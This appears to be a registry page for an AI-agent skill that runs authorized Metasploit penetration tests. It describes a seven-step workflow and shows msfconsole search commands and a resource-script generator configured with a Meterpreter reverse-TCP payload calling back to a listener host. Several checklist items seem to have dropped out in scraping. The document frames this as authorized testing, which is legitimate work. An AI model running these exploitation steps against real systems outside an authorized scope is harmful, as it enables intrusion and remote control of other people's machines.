metasploit
by @zengyuxiu
Plan and execute authorized Metasploit assessments for OpenClaw tasks with repeatable workflows, including target triage, exploit module selection, option tu...
clawhub install metasploit-skillπ About This Skill
name: openclaw-metasploit description: Plan and execute authorized Metasploit assessments for OpenClaw tasks with repeatable workflows, including target triage, exploit module selection, option tuning, .rc generation, controlled execution, and evidence-focused reporting. Use when requests involve msfconsole operations, module/payload matching, exploit/check automation, session verification, or pentest result writeups.
OpenClaw Metasploit
Overview
Use this skill to run deterministic and auditable Metasploit workflows for authorized security testing.
Prefer a check-first workflow and generate repeatable .rc scripts via scripts/build_rc.py instead of ad hoc console typing.
Workflow Decision Tree
1. Confirm authorization and scope before any technical step.
2. Collect target facts: service, version, network position, and constraints.
3. Select candidate modules and payloads using module-selection.md.
4. Generate and review a resource script with scripts/build_rc.py.
5. Execute in msfconsole with check before run or exploit.
6. Validate outcome with session and artifact evidence.
7. Produce a concise report with reproducible commands and findings.
Step 1: Confirm Scope and Safety
Require explicit confirmation of:
If scope is unclear, stop and ask for clarification before proceeding.
Step 2: Build Target Context
Capture minimum actionable context:
Use this context to justify each module choice.
Step 3: Select Modules and Payloads
Use search and info in msfconsole to narrow candidates:
search type:exploit cve:2023 service:http
info exploit/linux/http/
show options
show payloads
Choose modules by:
For common mappings and tradeoffs, read module-selection.md.
Step 4: Generate Resource Script
Generate reproducible execution scripts:
python3 scripts/build_rc.py \
--module exploit/linux/http/example_module \
--rhosts 10.10.10.15 \
--rport 8080 \
--payload linux/x64/meterpreter/reverse_tcp \
--lhost 10.10.10.5 \
--lport 4444 \
--set TARGETURI=/app \
--check \
--job \
--output run_example.rc
Review generated commands before execution:
Step 5: Execute in msfconsole
Run with logging enabled:
msfconsole -q -r run_example.rc
Inside msfconsole, verify:
check output statusrun or exploit resultsessions -l visibilityIf exploitation fails, adjust one variable at a time and re-run.
Step 6: Validate and Capture Evidence
Minimum evidence set:
Use workflow.md for command-level checklists and reporting structure.
Step 7: Report
Produce output with:
Keep reports concise and technically verifiable.
Resources
scripts/build_rc.py
Generate a repeatable Metasploit.rc resource script from structured options.